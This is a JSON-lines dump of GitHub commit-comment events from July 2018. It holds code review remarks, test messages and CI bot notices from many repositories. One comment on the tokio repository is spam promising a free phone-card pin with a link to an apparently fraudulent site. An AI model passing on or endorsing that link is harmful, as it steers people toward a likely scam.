{"id":"8032239797","type":"CommitCommentEvent","actor":{"login":"jacobwolson"},"repo":{"name":"jacobwolson/classic-arcade-game-udacity-fend-2018-grow-with-google-scholarship-project-3-object-oriented-js"},"payload":{"comment":{"id":29868353,"position":null,"line":null,"path":null,"commit_id":"862ea88fa276f1bed845842197df430ee0519fe2","created_at":"2018-07-28T13:05:19Z","updated_at":"2018-07-28T13:05:19Z","author_association":"OWNER","body":"Periods included on comments or not in consistent manner."}},"created_at":"2018-07-28T13:05:19Z"}
{"id":"8032243473","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29868361,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T13:08:19Z","updated_at":"2018-07-28T13:08:19Z","author_association":"OWNER","body":"tet"}},"created_at":"2018-07-28T13:08:19Z"}
{"id":"8032243766","type":"CommitCommentEvent","actor":{"login":"standingout"},"repo":{"name":"overwhelm07/AlgorithmGroupStudy"},"payload":{"comment":{"id":29868362,"position":null,"line":null,"path":null,"commit_id":"468ef9a196883aa3709e89e6b2b12f0b9c673d1c","created_at":"2018-07-28T13:08:34Z","updated_at":"2018-07-28T13:08:34Z","author_association":"NONE","body":"개발자스럽다"}},"created_at":"2018-07-28T13:08:34Z"}
{"id":"8032243790","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"lqd/rust"},"payload":{"comment":{"id":29868363,"position":90,"line":234,"path":"src/librustc_mir/borrow_check/nll/type_check/mod.rs","commit_id":"144aba25597ad02417a467e90bd25211b80933e4","created_at":"2018-07-28T13:08:36Z","updated_at":"2018-07-28T13:08:36Z","author_association":"NONE","body":"I think we can be more expansive than this, actually. E.g. assigning to `_0.1` still counts as escaping -- really, anything reachable from `_0` counts I believe."}},"created_at":"2018-07-28T13:08:36Z"}
{"id":"8032244433","type":"CommitCommentEvent","actor":{"login":"luis1xv"},"repo":{"name":"luis1xv/ios-sec"},"payload":{"comment":{"id":29868368,"position":null,"line":null,"path":null,"commit_id":"ad1f5125170f9e5426a90aa6b40d8ebdddc648a5","created_at":"2018-07-28T13:09:11Z","updated_at":"2018-07-28T13:09:11Z","author_association":"OWNER","body":"Recovery of https://community.cisco.com/t5/switching/logging-synchronous/td-p/1748681\r\nLatchum Naidu\r\n\r\n\tlogging synchronous\r\n\r\nunsolicited messages that are routed to your console are to be displayed at the terminal.\r\n\r\nUnsolicited messages and debug command output appears on the console after the prompt for user input is returned. Therefore, unsolicited messages and debug command output are not interspersed with solicited device output and prompts. After the unsolicited messages are displayed, the console again displays the user prompt.\r\n\r\nSay for example when you tried to telnet your Router or switch you will see lot of log messages before you logged in with username and password\r\n\r\n\r\nPlease rate the helpful posts.\r\nRegards,\r\nNaidu."}},"created_at":"2018-07-28T13:09:11Z"}
{"id":"8032245057","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29868370,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-28T13:09:41Z","updated_at":"2018-07-28T13:09:41Z","author_association":"COLLABORATOR","body":"Что-то я уже малость подзабыл. Не могу понять, как сохранялось состояние заряженности подствольника? Сейчас, после своего изменения, проверяю, подствольник после загрузки сейва разряжен, но сейв делался с заряженным подствольником.\r\n"}},"created_at":"2018-07-28T13:09:41Z"}
{"id":"8032245560","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29868374,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T13:10:08Z","updated_at":"2018-07-28T13:10:08Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-28T13:10:08Z"}
{"id":"8032245668","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"lqd/rust"},"payload":{"comment":{"id":29868375,"position":96,"line":240,"path":"src/librustc_mir/borrow_check/nll/type_check/mod.rs","commit_id":"144aba25597ad02417a467e90bd25211b80933e4","created_at":"2018-07-28T13:10:12Z","updated_at":"2018-07-28T13:10:12Z","author_association":"NONE","body":"*This* seems too strong though... for example, if you had something like\r\n\r\n```rust\r\nconst fn add(x: &u32, y: &u32) { *x + *y }\r\n\r\nconst X: u32 = add(&22, &44);\r\n```\r\n\r\nthen the 22 and 44 there do not escape, but I think this analysis will claim that they do. I think we want to match on the rvalue here instead and look for various cases. We can start conservative and expand if we like."}},"created_at":"2018-07-28T13:10:12Z"}
{"id":"8032247273","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"lqd/rust"},"payload":{"comment":{"id":29868378,"position":129,"line":273,"path":"src/librustc_mir/borrow_check/nll/type_check/mod.rs","commit_id":"144aba25597ad02417a467e90bd25211b80933e4","created_at":"2018-07-28T13:11:28Z","updated_at":"2018-07-28T13:11:28Z","author_association":"NONE","body":"Here, I think what I expected is to add this information into the `LivenessMap`, more or less. So basically we would exclude variables that were unified with `_0` from being in the liveness map -- and perhaps store them in a separate vector, as you have done, or we could even just keep the unification table in the liveness map. That way, we can readily test if they were unified with `_0` and push the regions to `'static`."}},"created_at":"2018-07-28T13:11:28Z"}
{"id":"8032248112","type":"CommitCommentEvent","actor":{"login":"jerrykress"},"repo":{"name":"jerrykress/CPP"},"payload":{"comment":{"id":29868380,"position":null,"line":null,"path":null,"commit_id":"12844c242ff02857f0ef938aeaeebcf4d0781a79","created_at":"2018-07-28T13:12:10Z","updated_at":"2018-07-28T13:12:10Z","author_association":"OWNER","body":"A simple 3D vector calculator"}},"created_at":"2018-07-28T13:12:10Z"}
{"id":"8032249128","type":"CommitCommentEvent","actor":{"login":"socketbind"},"repo":{"name":"socketbind/tftp4j"},"payload":{"comment":{"id":29868383,"position":null,"line":null,"path":null,"commit_id":"07f81e965db0d3d54e9866b816e25c1ee1cfc416","created_at":"2018-07-28T13:12:57Z","updated_at":"2018-07-28T13:12:57Z","author_association":"OWNER","body":"I do vaguely remember that without these changes most U-Boot clients would download a bit of data then would time out and hang. It was definitely an issue with the server code (used Wireshark to find that out).\r\n\r\nI have zero idea on the significance of this specific commit though. It was some strange interaction that caused the whole issue but I have a really hard time recalling anything, sorry."}},"created_at":"2018-07-28T13:12:57Z"}
{"id":"8032250663","type":"CommitCommentEvent","actor":{"login":"P-Bl4ck"},"repo":{"name":"P-Bl4ck/Vimex"},"payload":{"comment":{"id":29868389,"position":null,"line":null,"path":null,"commit_id":"cbe9a964a1b52dc174d278135dbf0a5138f398bd","created_at":"2018-07-28T13:14:11Z","updated_at":"2018-07-28T13:14:11Z","author_association":"OWNER","body":"sd"}},"created_at":"2018-07-28T13:14:11Z"}
{"id":"8032251228","type":"CommitCommentEvent","actor":{"login":"satazor"},"repo":{"name":"ipfs/js.ipfs.io"},"payload":{"comment":{"id":29868390,"position":null,"line":null,"path":null,"commit_id":"3bffc2e4d9c5cedd3a20891c87c561cb068921e3","created_at":"2018-07-28T13:14:40Z","updated_at":"2018-07-28T13:14:40Z","author_association":"MEMBER","body":"I made a mistake in my last commit, I wanted to upgrade to `gatsby-plugin-ipfs@1.0.0` 😇"}},"created_at":"2018-07-28T13:14:40Z"}
{"id":"8032253465","type":"CommitCommentEvent","actor":{"login":"miomiomiomio"},"repo":{"name":"miomiomiomio/COLONIC-POLYP-TYPE-IDENTIFICATION"},"payload":{"comment":{"id":29868396,"position":null,"line":null,"path":null,"commit_id":"4a7f055a9ae31c97b05f0a890b9ee0ec99f1920a","created_at":"2018-07-28T13:16:27Z","updated_at":"2018-07-28T13:16:27Z","author_association":"OWNER","body":"research result"}},"created_at":"2018-07-28T13:16:27Z"}
{"id":"8032254605","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29868398,"position":19,"line":17,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-28T13:17:23Z","updated_at":"2018-07-28T13:17:23Z","author_association":"NONE","body":"Increase the timeout if you know the test takes longer than the default.\r\nSkip if you need Ganache and you detect that it is Geth."}},"created_at":"2018-07-28T13:17:23Z"}
{"id":"8032255944","type":"CommitCommentEvent","actor":{"login":"Ammadkhalid"},"repo":{"name":"Ammadkhalid/am-dataset"},"payload":{"comment":{"id":29868404,"position":null,"line":null,"path":null,"commit_id":"9d282bd14c2edf9afd02f8ab1269c47de27124a2","created_at":"2018-07-28T13:18:27Z","updated_at":"2018-07-28T13:18:27Z","author_association":"OWNER","body":"That's fine."}},"created_at":"2018-07-28T13:18:27Z"}
{"id":"8032256068","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29868405,"position":48,"line":30,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-28T13:18:34Z","updated_at":"2018-07-28T13:18:34Z","author_association":"NONE","body":"Have you tried `.splitFunds(.. { value: aBigNumber })`? This works."}},"created_at":"2018-07-28T13:18:34Z"}
{"id":"8032256703","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"rurban/smhasher"},"payload":{"comment":{"id":29868408,"position":6,"line":86,"path":"main.cpp","commit_id":"9707b94d0228950b5de9ce1fbc434c2af6c4c8f5","created_at":"2018-07-28T13:19:01Z","updated_at":"2018-07-28T13:19:01Z","author_association":"OWNER","body":"Because MSVC truncates long to int32 and the implementor needs to be aware of it. He is not."}},"created_at":"2018-07-28T13:19:01Z"}
{"id":"8032257005","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29868414,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-28T13:19:15Z","updated_at":"2018-07-28T13:19:15Z","author_association":"OWNER","body":"Может это забыл убрать, не? https://github.com/dsh2dsh/op2ogse/commit/4f167986d482c5537bb45e6cae29477fdf071e7c#diff-5b0f3c385996fd3b76b0bf2050304a76"}},"created_at":"2018-07-28T13:19:15Z"}
{"id":"8032258978","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29868416,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T13:20:46Z","updated_at":"2018-07-28T13:20:46Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-28T13:20:46Z"}
{"id":"8032259784","type":"CommitCommentEvent","actor":{"login":"chdh"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29868423,"position":14,"line":572,"path":"lib/_stream_writable.js","commit_id":"ce83099d3e6f6d7be0e533c19cd7f905bba4ea2a","created_at":"2018-07-28T13:21:24Z","updated_at":"2018-07-28T13:21:24Z","author_association":"CONTRIBUTOR","body":"It's not the fault of this change, but when `Writable.end()` is called with a callback (`cb` parameter) and `state.ending` is already set, the callback is never called. This is obvious when you look at the whole code in `Writable.end()`."}},"created_at":"2018-07-28T13:21:24Z"}
{"id":"8032260396","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29868425,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-28T13:21:57Z","updated_at":"2018-07-28T13:21:57Z","author_association":"COLLABORATOR","body":"Не-не, это убрал. Я в коде до изменения не вижу, где сохранялось кол-во зарядов в подствольнике. Т.е. вижу это только в save() и load(), но ты говорил, что оно не используется. Да и сейчас save() и load() отличаются от предыдущей версии незначительно."}},"created_at":"2018-07-28T13:21:57Z"}
{"id":"8032270308","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29868455,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T13:29:29Z","updated_at":"2018-07-28T13:29:29Z","author_association":"OWNER","body":"wery"}},"created_at":"2018-07-28T13:29:29Z"}
{"id":"8032270746","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29868456,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-28T13:29:49Z","updated_at":"2018-07-28T13:29:49Z","author_association":"OWNER","body":"Ну да, видимо так и есть."}},"created_at":"2018-07-28T13:29:49Z"}
{"id":"8032273431","type":"CommitCommentEvent","actor":{"login":"Readock"},"repo":{"name":"BrotBerserker/InflectionPoint"},"payload":{"comment":{"id":29868471,"position":null,"line":null,"path":null,"commit_id":"66c6d78ee1786396e0ff787c573f60e8a6565972","created_at":"2018-07-28T13:31:44Z","updated_at":"2018-07-28T13:31:44Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Kill history blurred](https://trello.com/c/EySR59W4/166-kill-history-blurred)"}},"created_at":"2018-07-28T13:31:44Z"}
{"id":"8032273790","type":"CommitCommentEvent","actor":{"login":"Readock"},"repo":{"name":"BrotBerserker/InflectionPoint"},"payload":{"comment":{"id":29868472,"position":null,"line":null,"path":null,"commit_id":"66c6d78ee1786396e0ff787c573f60e8a6565972","created_at":"2018-07-28T13:31:59Z","updated_at":"2018-07-28T13:31:59Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [warmup ding nicht zentriert](https://trello.com/c/k8PYzNWv/167-warmup-ding-nicht-zentriert)"}},"created_at":"2018-07-28T13:31:59Z"}
{"id":"8032277726","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyembree-feedstock"},"payload":{"comment":{"id":29868479,"position":null,"line":null,"path":null,"commit_id":"9077e92c56d8ca625b8a12bf785c1a70e12be361","created_at":"2018-07-28T13:34:51Z","updated_at":"2018-07-28T13:34:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xarthisius was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T13:34:51Z"}
{"id":"8032278542","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29868483,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-28T13:35:28Z","updated_at":"2018-07-28T13:35:28Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2394 of 2964 tests passed, 57 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 500 tests had: ESO small diffs.\n * 362 tests had: MTR small diffs.\n * 566 tests had: Table big diffs.\n * 1 test had: BND diffs.\n * 87 tests had: ESO big diffs.\n * 91 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 21 tests had: ERR diffs.\n * 20 tests had: ZSZ small diffs.\n * 2 tests had: MTD diffs.\n * 10 tests had: SSZ small diffs.\n * 3 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 73\n * Failed: 570\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.77%25-red.png)</a> \n"}},"created_at":"2018-07-28T13:35:28Z"}
{"id":"8032282204","type":"CommitCommentEvent","actor":{"login":"kmaksimovv"},"repo":{"name":"kmaksimovv/testfile"},"payload":{"comment":{"id":29868489,"position":null,"line":null,"path":null,"commit_id":"da9997f1063b2e68cd12f4b837e3d9c442354717","created_at":"2018-07-28T13:38:12Z","updated_at":"2018-07-28T13:38:12Z","author_association":"OWNER","body":"wert"}},"created_at":"2018-07-28T13:38:12Z"}
{"id":"8032284641","type":"CommitCommentEvent","actor":{"login":"hk01-digital-bot[bot]"},"repo":{"name":"hk01-digital/keel"},"payload":{"comment":{"id":29868504,"position":null,"line":null,"path":null,"commit_id":"993ad35e697b82fb6b84e5447772482d60e25446","created_at":"2018-07-28T13:39:58Z","updated_at":"2018-07-28T13:39:58Z","author_association":"NONE","body":"`karolis.rusenas@gmail.com`\nPlease commit with your `@hk01.com` or `@dwnews.com` email.\nhttps://help.github.com/articles/setting-your-commit-email-address-in-git/"}},"created_at":"2018-07-28T13:39:58Z"}
{"id":"8032285945","type":"CommitCommentEvent","actor":{"login":"drewricheaux"},"repo":{"name":"tokio-rs/tokio"},"payload":{"comment":{"id":29868505,"position":null,"line":null,"path":null,"commit_id":"ab07733d665a8e086c91cc7cb993ae2afcca4be2","created_at":"2018-07-28T13:40:50Z","updated_at":"2018-07-28T13:40:50Z","author_association":"NONE","body":"I just got a Boost Mobile reboost card pin for free! :D  http://freeboostminutes.co.network"}},"created_at":"2018-07-28T13:40:50Z"}
{"id":"8032285954","type":"CommitCommentEvent","actor":{"login":"JellyWang7"},"repo":{"name":"getlantern/download"},"payload":{"comment":{"id":29868506,"position":null,"line":null,"path":null,"commit_id":"c5fd374862fcd8d8a4cb989ca51a16ebe870b621","created_at":"2018-07-28T13:40:50Z","updated_at":"2018-07-28T13:40:50Z","author_association":"NONE","body":"为啥中文论坛又没了而且最近连接不太好断断续续？"}},"created_at":"2018-07-28T13:40:50Z"}
{"id":"8032288589","type":"CommitCommentEvent","actor":{"login":"alexxxdev"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29868510,"position":null,"line":null,"path":null,"commit_id":"fb733dce7f47c02fbc1f57f3f24560e03a5ba8b2","created_at":"2018-07-28T13:42:50Z","updated_at":"2018-07-28T13:42:50Z","author_association":"MEMBER","body":"https://github.com/AEXmod/platform_packages_apps_Dialer/commit/8099cb7291753f274e8075c981f52a6cd20b8152"}},"created_at":"2018-07-28T13:42:50Z"}
{"id":"8032289280","type":"CommitCommentEvent","actor":{"login":"noamtamim"},"repo":{"name":"swisspol/GCDWebServer"},"payload":{"comment":{"id":29868513,"position":6,"line":169,"path":"GCDWebServer/Core/GCDWebServerFunctions.m","commit_id":"c35d514b086cf694281b6f8cc6a351e0e71d2114","created_at":"2018-07-28T13:43:26Z","updated_at":"2018-07-28T13:43:26Z","author_association":"NONE","body":"How is this feature used by an app? It typically calls `-[GCDWebServer addGETHandlerForBasePath:directoryPath:indexFilename:cacheAge:allowRangeRequests:]`, which doesn't allow passing the overrides.\r\n"}},"created_at":"2018-07-28T13:43:26Z"}
{"id":"8032290534","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29868514,"position":null,"line":null,"path":null,"commit_id":"2d5aabc0df652543d1d36bb0c7a7e22c6962dea0","created_at":"2018-07-28T13:44:21Z","updated_at":"2018-07-28T13:44:21Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-75](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-75).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-75-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-28T13:44:21Z"}
{"id":"8032293559","type":"CommitCommentEvent","actor":{"login":"grimfang4"},"repo":{"name":"grimfang4/sdl-gpu"},"payload":{"comment":{"id":29868534,"position":null,"line":null,"path":null,"commit_id":"9ea50854150a6c3d3bf5b1bebc61f7b644b173fb","created_at":"2018-07-28T13:46:30Z","updated_at":"2018-07-28T13:46:30Z","author_association":"OWNER","body":"This is fixed as of dd982b9c7af9f9f7c8806d20cf29ff348f8ab937.  Thanks!"}},"created_at":"2018-07-28T13:46:30Z"}
{"id":"8032293649","type":"CommitCommentEvent","actor":{"login":"Nathapon8899"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29868535,"position":2,"line":79,"path":"bip-0069.mediawiki","commit_id":"3640129163299bc19e5f5c16fffde264127a3c1d","created_at":"2018-07-28T13:46:35Z","updated_at":"2018-07-28T13:46:35Z","author_association":"NONE","body":"Natapon"}},"created_at":"2018-07-28T13:46:35Z"}
{"id":"8032296927","type":"CommitCommentEvent","actor":{"login":"MOZGIII"},"repo":{"name":"golang/mock"},"payload":{"comment":{"id":29868543,"position":null,"line":null,"path":null,"commit_id":"87f106fccd7e3ced294a19e86bebd7846911690a","created_at":"2018-07-28T13:49:08Z","updated_at":"2018-07-28T13:49:08Z","author_association":"NONE","body":"This doesn't seem to be the case. I'll feel like I just need to read the source code - the answer must be there."}},"created_at":"2018-07-28T13:49:08Z"}
{"id":"8032298638","type":"CommitCommentEvent","actor":{"login":"Nathapon8899"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29868547,"position":null,"line":null,"path":null,"commit_id":"3640129163299bc19e5f5c16fffde264127a3c1d","created_at":"2018-07-28T13:50:17Z","updated_at":"2018-07-28T13:50:17Z","author_association":"NONE","body":"Natapon"}},"created_at":"2018-07-28T13:50:17Z"}
{"id":"8032301066","type":"CommitCommentEvent","actor":{"login":"Jorys-Paulin"},"repo":{"name":"Jorys-Paulin/moonlight-qt"},"payload":{"comment":{"id":29868556,"position":null,"line":null,"path":null,"commit_id":"2a4cce71a370fcec521bea0eceed90ad4e9f16ae","created_at":"2018-07-28T13:51:44Z","updated_at":"2018-07-28T13:51:44Z","author_association":"OWNER","body":"Well, that build didn't work:\r\n```bash\r\nconfig.tests/SLVideo/main.cpp:1:21: fatal error: SLVideo.h: No such file or directory\r\n #include <SLVideo.h>\r\n                     ^\r\ncompilation terminated.\r\nmake: *** [main.o] Error 1\r\n```\r\nI'll ask cgutman for help on that one"}},"created_at":"2018-07-28T13:51:44Z"}
{"id":"8032302866","type":"CommitCommentEvent","actor":{"login":"lheckemann"},"repo":{"name":"mackwic/colored"},"payload":{"comment":{"id":29868560,"position":null,"line":null,"path":null,"commit_id":"8501cc88be44d00f5a52a9a75f5e0e27c512bd04","created_at":"2018-07-28T13:52:55Z","updated_at":"2018-07-28T13:52:55Z","author_association":"NONE","body":"This isn't a typo, just British spelling."}},"created_at":"2018-07-28T13:52:55Z"}
{"id":"8032303895","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29868561,"position":null,"line":null,"path":null,"commit_id":"5a1b98449c33eece3fe12dcc96b33caafd04657f","created_at":"2018-07-28T13:53:36Z","updated_at":"2018-07-28T13:53:36Z","author_association":"COLLABORATOR","body":"Puzzle `452-ce38bf44` discovered in   [`shopelectro/tests/tests_commands.py`](  https://github.com/fidals/shopelectro/blob/master/shopelectro/tests/tests_commands.py)   and submitted as #460. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-28T13:53:36Z"}
{"id":"8032304435","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29868563,"position":null,"line":null,"path":null,"commit_id":"80f38b918600a56bcc11baf73f66a027dae8aa6a","created_at":"2018-07-28T13:53:58Z","updated_at":"2018-07-28T13:53:58Z","author_association":"NONE","body":"`depth - 2 * ONE_PLY` can be negative and so the corresponding stat bonus too. That makes no sense.\r\nThat would reverse the history update logic (good move history goes down and bad moves history goes up.\r\nbetter use `std::max(depth - 2 * ONE_PLY, DEPTH_ZERO)`. "}},"created_at":"2018-07-28T13:53:58Z"}
{"id":"8032308447","type":"CommitCommentEvent","actor":{"login":"nguyenhien1994"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29868574,"position":49,"line":101,"path":"u-boot_v2018.05-rc1/cmd/fat.c","commit_id":"31d32044a8933aacffde35dc45f5e72f4f8fa56c","created_at":"2018-07-28T13:56:34Z","updated_at":"2018-07-28T13:56:34Z","author_association":"COLLABORATOR","body":"The second is `_maxargs`, so I think it should be `1` instead of `7`"}},"created_at":"2018-07-28T13:56:34Z"}
{"id":"8032310631","type":"CommitCommentEvent","actor":{"login":"TiagoERodrigues"},"repo":{"name":"TiagoERodrigues/ProjetoLiga"},"payload":{"comment":{"id":29868581,"position":null,"line":null,"path":null,"commit_id":"2aa8ba5d0d47a7a338742d7ca45ede40addb7fd3","created_at":"2018-07-28T13:58:03Z","updated_at":"2018-07-28T13:58:03Z","author_association":"OWNER","body":"Falta o desenvolvimento do JS para que ele gere um PDF e mande no meu e-mail."}},"created_at":"2018-07-28T13:58:03Z"}
{"id":"8032312674","type":"CommitCommentEvent","actor":{"login":"hhdang6637"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29868583,"position":49,"line":101,"path":"u-boot_v2018.05-rc1/cmd/fat.c","commit_id":"31d32044a8933aacffde35dc45f5e72f4f8fa56c","created_at":"2018-07-28T13:59:23Z","updated_at":"2018-07-28T13:59:23Z","author_association":"OWNER","body":"You can fix directly into master branch"}},"created_at":"2018-07-28T13:59:23Z"}
{"id":"8032313548","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29868590,"position":null,"line":null,"path":null,"commit_id":"80f38b918600a56bcc11baf73f66a027dae8aa6a","created_at":"2018-07-28T13:59:57Z","updated_at":"2018-07-28T13:59:57Z","author_association":"NONE","body":"Or you cover this case in the stat_bonus function:\r\n```\r\n// History and stats update bonus, based on depth\r\n  int stat_bonus(Depth depth) {\r\n    int d = depth / ONE_PLY;\r\n    return d > 17 || d < 0 ? 0 : 33 * d * d + 66 * d - 66;\r\n  }\r\n```"}},"created_at":"2018-07-28T13:59:57Z"}
{"id":"8032314998","type":"CommitCommentEvent","actor":{"login":"tanvir1989bd"},"repo":{"name":"marshallmcdonnell/lammps_widom_insertion"},"payload":{"comment":{"id":29868600,"position":null,"line":null,"path":null,"commit_id":"9928af02cec24de416fabbd599ad7ea56a3ac6e6","created_at":"2018-07-28T14:00:44Z","updated_at":"2018-07-28T14:00:44Z","author_association":"NONE","body":"Thank you for your code on chemical potentials calculations.  Could you please add some instructions how can I run this code in a windows machine?    "}},"created_at":"2018-07-28T14:00:44Z"}
{"id":"8032315170","type":"CommitCommentEvent","actor":{"login":"AldiSatrioAji"},"repo":{"name":"AldiSatrioAji/tutor"},"payload":{"comment":{"id":29868603,"position":4,"line":4,"path":"index.html","commit_id":"50a4ef5e2f103342b6012a0fafc582b089294e75","created_at":"2018-07-28T14:00:50Z","updated_at":"2018-07-28T14:00:50Z","author_association":"OWNER","body":"tesst"}},"created_at":"2018-07-28T14:00:50Z"}
{"id":"8032319301","type":"CommitCommentEvent","actor":{"login":"AndersonBarrosDevFrontEnd"},"repo":{"name":"andersonbarrosdev/curso-javascript-ninja"},"payload":{"comment":{"id":29868613,"position":null,"line":null,"path":null,"commit_id":"5be60b3bfe0bf5a9ce87f1447fae1d22e355cdb8","created_at":"2018-07-28T14:03:24Z","updated_at":"2018-07-28T14:03:24Z","author_association":"NONE","body":"Esse é meu primeiro exercício."}},"created_at":"2018-07-28T14:03:24Z"}
{"id":"8032319584","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29868614,"position":null,"line":null,"path":null,"commit_id":"961d6bdcc73ecd28e23b66bf003393e3c19e0d3f","created_at":"2018-07-28T14:03:33Z","updated_at":"2018-07-28T14:03:33Z","author_association":"OWNER","body":"Fixes #25 "}},"created_at":"2018-07-28T14:03:33Z"}
{"id":"8032320428","type":"CommitCommentEvent","actor":{"login":"junyingjy"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29868615,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-28T14:04:05Z","updated_at":"2018-07-28T14:04:05Z","author_association":"NONE","body":"更新到2.1.3后一直出现 启动失败，请检查 because proxy not running correctly."}},"created_at":"2018-07-28T14:04:05Z"}
{"id":"8032320769","type":"CommitCommentEvent","actor":{"login":"mordecai"},"repo":{"name":"mordecai/levenphish"},"payload":{"comment":{"id":29868616,"position":null,"line":null,"path":null,"commit_id":"ed42c2712933747a0c1386e525880086ba56f8f3","created_at":"2018-07-28T14:04:18Z","updated_at":"2018-07-28T14:04:18Z","author_association":"OWNER","body":"With thanks to the deadrobot and levenstein."}},"created_at":"2018-07-28T14:04:18Z"}
